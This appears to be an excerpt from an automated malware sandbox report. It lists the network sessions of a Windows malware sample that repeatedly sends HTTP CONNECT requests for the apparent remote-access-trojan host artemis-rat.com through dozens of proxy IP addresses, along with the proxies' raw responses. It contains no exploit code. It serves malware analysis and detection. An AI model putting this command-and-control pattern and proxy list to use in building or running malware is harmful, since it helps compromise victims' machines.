                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:58.334985018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1065192.168.2.452180192.111.134.1041457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.914300919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1066192.168.2.452905184.170.245.14841457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.919836998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1067192.168.2.45332491.134.140.160530127284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.919843912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.866209030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.054275036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1068192.168.2.453416104.19.138.4807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.919977903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.074130058 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1069192.168.2.453286103.190.54.141807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.920085907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1070192.168.2.453423172.67.53.215807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.920757055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.075108051 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1071192.168.2.45335594.130.94.45807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.921355963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.229546070 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1072192.168.2.453430172.67.69.9807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.922441959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.076499939 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1073192.168.2.452369171.250.218.11310807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.923054934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1074192.168.2.451273132.148.154.97109587284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.925977945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069564104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164635897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.366496086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1075192.168.2.453448104.24.236.203807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.928841114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.083185911 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1076192.168.2.45335745.120.178.19710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.928842068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1077192.168.2.45340218.135.133.11631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.931003094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.225145102 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1078192.168.2.453462104.20.22.93807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.932797909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.087263107 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1079192.168.2.453356194.146.110.22810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.936316967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1080192.168.2.453382154.85.58.149807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.944819927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.482783079 CET321INHTTP/1.1 400 Bad Request
                                              Server: openresty/1.15.8.2
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 163
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.15.8.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1081192.168.2.453275117.160.250.16399997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.949448109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163304090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.881120920 CET221INHTTP/1.1 403 Access Denied
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Connection: close
                                              Cache-Control: no-store
                                              Content-Type: text/html
                                              Content-Language: en
                                              Content-Length: 43
                                              Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                              Data Ascii: You are not allowed to access the document.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1082192.168.2.453442192.163.200.82390957284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.952796936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.553905964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163521051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366827965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.554481030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.866614103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.054414034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366381884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.070230961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1083192.168.2.453576140.84.176.2464437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.964953899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1084192.168.2.453582140.84.176.2464437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.966355085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1085192.168.2.453584140.84.176.2464437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.967783928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1086192.168.2.453585140.84.176.2464437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.968719006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1087192.168.2.453444209.126.104.38407507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.981905937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.554037094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366636992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.757354975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.266752958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866599083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366697073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.366472960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
